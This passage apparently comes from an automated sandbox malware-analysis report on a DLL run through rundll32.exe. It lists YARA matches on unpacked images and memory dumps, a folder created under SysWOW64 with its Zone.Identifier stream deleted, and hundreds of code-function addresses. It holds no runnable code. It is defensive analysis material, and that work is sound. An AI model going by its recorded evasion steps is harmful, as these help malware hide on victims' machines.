Source: Yara match	File source: 8.3.rundll32.exe.3246c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.c16c78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.c16c78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.b46c68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.b46c68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.b46c68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.359659135.0000000000FA6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.363179746.0000000000B42000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.359231508.0000000000B46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.494236269.0000000003233000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.359880008.0000000000C16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.359009454.0000000000B46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.431973841.0000000003233000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.365562801.0000000000F66000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.382797966.0000000003233000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.877277824.0000000003233000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.359302351.0000000000C16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.361400733.0000000000BDA000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Source: qrb6jVwzoe.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Mkjhtkxzcnwc\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F31BB30	3_2_6F31BB30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F319F20	3_2_6F319F20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F31B2B0	3_2_6F31B2B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F326564	3_2_6F326564
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F31B080	3_2_6F31B080
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F31BB30	4_2_6F31BB30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F319F20	4_2_6F319F20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F31B2B0	4_2_6F31B2B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F326564	4_2_6F326564
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F31B080	4_2_6F31B080
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000441E	4_2_1000441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001CAA8	4_2_1001CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100143B3	4_2_100143B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10004C00	4_2_10004C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10008C09	4_2_10008C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10011C10	4_2_10011C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000F41F	4_2_1000F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000EC27	4_2_1000EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001F83F	4_2_1001F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001E441	4_2_1001E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10002043	4_2_10002043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10003845	4_2_10003845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000A048	4_2_1000A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001406E	4_2_1001406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10001C76	4_2_10001C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001748A	4_2_1001748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000CC8D	4_2_1000CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001D091	4_2_1001D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10003C91	4_2_10003C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000AC95	4_2_1000AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001AC9B	4_2_1001AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100178A5	4_2_100178A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100144AA	4_2_100144AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100190BA	4_2_100190BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100198BD	4_2_100198BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100208D1	4_2_100208D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001CCD4	4_2_1001CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001ECE3	4_2_1001ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001A8F0	4_2_1001A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100030F6	4_2_100030F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10003502	4_2_10003502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001FD10	4_2_1001FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000251C	4_2_1000251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10005923	4_2_10005923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002292B	4_2_1002292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001F14D	4_2_1001F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000C158	4_2_1000C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001056A	4_2_1001056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10014D8D	4_2_10014D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000758F	4_2_1000758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000FD91	4_2_1000FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10021193	4_2_10021193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001D99A	4_2_1001D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10019DA1	4_2_10019DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001B1B5	4_2_1001B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100225C3	4_2_100225C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100055E8	4_2_100055E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000C5FE	4_2_1000C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10001A0A	4_2_10001A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000220A	4_2_1000220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000E21C	4_2_1000E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10015220	4_2_10015220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10009E22	4_2_10009E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000D223	4_2_1000D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10021A3C	4_2_10021A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10002A46	4_2_10002A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10002654	4_2_10002654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10009A57	4_2_10009A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10007283	4_2_10007283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10020687	4_2_10020687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10014E8A	4_2_10014E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000FEA0	4_2_1000FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001D6A7	4_2_1001D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000DAAE	4_2_1000DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10005AB2	4_2_10005AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001BEC9	4_2_1001BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10017ED1	4_2_10017ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10010ADE	4_2_10010ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001AEEB	4_2_1001AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001DEF4	4_2_1001DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10002309	4_2_10002309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10006B25	4_2_10006B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10020B34	4_2_10020B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10021343	4_2_10021343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10003345	4_2_10003345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10003F5C	4_2_10003F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10011F6B	4_2_10011F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001577E	4_2_1001577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10009384	4_2_10009384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10004F8E	4_2_10004F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001B397	4_2_1001B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10012FA2	4_2_10012FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10014BAA	4_2_10014BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10017BB2	4_2_10017BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000BFB6	4_2_1000BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10006FC4	4_2_10006FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000A3DF	4_2_1000A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001BFE8	4_2_1001BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100203F1	4_2_100203F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10004C00	5_2_10004C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000441E	5_2_1000441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000F41F	5_2_1000F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10002043	5_2_10002043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10003845	5_2_10003845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10002A46	5_2_10002A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001CAA8	5_2_1001CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100190BA	5_2_100190BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100208D1	5_2_100208D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001ECE3	5_2_1001ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001AEEB	5_2_1001AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001DEF4	5_2_1001DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001056A	5_2_1001056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10009384	5_2_10009384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001D99A	5_2_1001D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10017BB2	5_2_10017BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10008C09	5_2_10008C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10001A0A	5_2_10001A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000220A	5_2_1000220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10011C10	5_2_10011C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000E21C	5_2_1000E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10015220	5_2_10015220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10009E22	5_2_10009E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000D223	5_2_1000D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000EC27	5_2_1000EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001F83F	5_2_1001F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10021A3C	5_2_10021A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001E441	5_2_1001E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000A048	5_2_1000A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10002654	5_2_10002654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10009A57	5_2_10009A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001406E	5_2_1001406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10001C76	5_2_10001C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10007283	5_2_10007283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10020687	5_2_10020687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10014E8A	5_2_10014E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001748A	5_2_1001748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000CC8D	5_2_1000CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001D091	5_2_1001D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10003C91	5_2_10003C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000AC95	5_2_1000AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001AC9B	5_2_1001AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000FEA0	5_2_1000FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100178A5	5_2_100178A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001D6A7	5_2_1001D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100144AA	5_2_100144AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000DAAE	5_2_1000DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10005AB2	5_2_10005AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100198BD	5_2_100198BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001BEC9	5_2_1001BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10017ED1	5_2_10017ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001CCD4	5_2_1001CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10010ADE	5_2_10010ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001A8F0	5_2_1001A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100030F6	5_2_100030F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10003502	5_2_10003502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10002309	5_2_10002309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001FD10	5_2_1001FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000251C	5_2_1000251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10005923	5_2_10005923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10006B25	5_2_10006B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1002292B	5_2_1002292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10020B34	5_2_10020B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10021343	5_2_10021343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10003345	5_2_10003345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001F14D	5_2_1001F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000C158	5_2_1000C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10003F5C	5_2_10003F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10011F6B	5_2_10011F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001577E	5_2_1001577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10014D8D	5_2_10014D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10004F8E	5_2_10004F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000758F	5_2_1000758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000FD91	5_2_1000FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10021193	5_2_10021193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001B397	5_2_1001B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10019DA1	5_2_10019DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10012FA2	5_2_10012FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10014BAA	5_2_10014BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100143B3	5_2_100143B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001B1B5	5_2_1001B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000BFB6	5_2_1000BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100225C3	5_2_100225C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10006FC4	5_2_10006FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000A3DF	5_2_1000A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100055E8	5_2_100055E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001BFE8	5_2_1001BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_100203F1	5_2_100203F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1000C5FE	5_2_1000C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10004C00	6_2_10004C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000441E	6_2_1000441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10003845	6_2_10003845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10002A46	6_2_10002A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100208D1	6_2_100208D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001ECE3	6_2_1001ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001AEEB	6_2_1001AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001DEF4	6_2_1001DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10009384	6_2_10009384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001D99A	6_2_1001D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10017BB2	6_2_10017BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10008C09	6_2_10008C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10001A0A	6_2_10001A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000220A	6_2_1000220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10011C10	6_2_10011C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000E21C	6_2_1000E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000F41F	6_2_1000F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10015220	6_2_10015220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10009E22	6_2_10009E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000D223	6_2_1000D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000EC27	6_2_1000EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001F83F	6_2_1001F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10021A3C	6_2_10021A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001E441	6_2_1001E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10002043	6_2_10002043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000A048	6_2_1000A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10002654	6_2_10002654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10009A57	6_2_10009A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001406E	6_2_1001406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10001C76	6_2_10001C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10007283	6_2_10007283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10020687	6_2_10020687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10014E8A	6_2_10014E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001748A	6_2_1001748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000CC8D	6_2_1000CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001D091	6_2_1001D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10003C91	6_2_10003C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000AC95	6_2_1000AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001AC9B	6_2_1001AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000FEA0	6_2_1000FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100178A5	6_2_100178A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001D6A7	6_2_1001D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001CAA8	6_2_1001CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100144AA	6_2_100144AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000DAAE	6_2_1000DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10005AB2	6_2_10005AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100190BA	6_2_100190BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100198BD	6_2_100198BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001BEC9	6_2_1001BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10017ED1	6_2_10017ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001CCD4	6_2_1001CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10010ADE	6_2_10010ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001A8F0	6_2_1001A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100030F6	6_2_100030F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10003502	6_2_10003502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10002309	6_2_10002309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001FD10	6_2_1001FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000251C	6_2_1000251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10005923	6_2_10005923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10006B25	6_2_10006B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1002292B	6_2_1002292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10020B34	6_2_10020B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10021343	6_2_10021343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10003345	6_2_10003345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001F14D	6_2_1001F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000C158	6_2_1000C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10003F5C	6_2_10003F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10011F6B	6_2_10011F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001056A	6_2_1001056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001577E	6_2_1001577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10014D8D	6_2_10014D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10004F8E	6_2_10004F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000758F	6_2_1000758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000FD91	6_2_1000FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10021193	6_2_10021193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001B397	6_2_1001B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10019DA1	6_2_10019DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10012FA2	6_2_10012FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10014BAA	6_2_10014BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100143B3	6_2_100143B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001B1B5	6_2_1001B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000BFB6	6_2_1000BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100225C3	6_2_100225C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10006FC4	6_2_10006FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000A3DF	6_2_1000A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100055E8	6_2_100055E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001BFE8	6_2_1001BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100203F1	6_2_100203F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000C5FE	6_2_1000C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000441E	7_2_1000441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CAA8	7_2_1001CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100143B3	7_2_100143B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004C00	7_2_10004C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008C09	7_2_10008C09
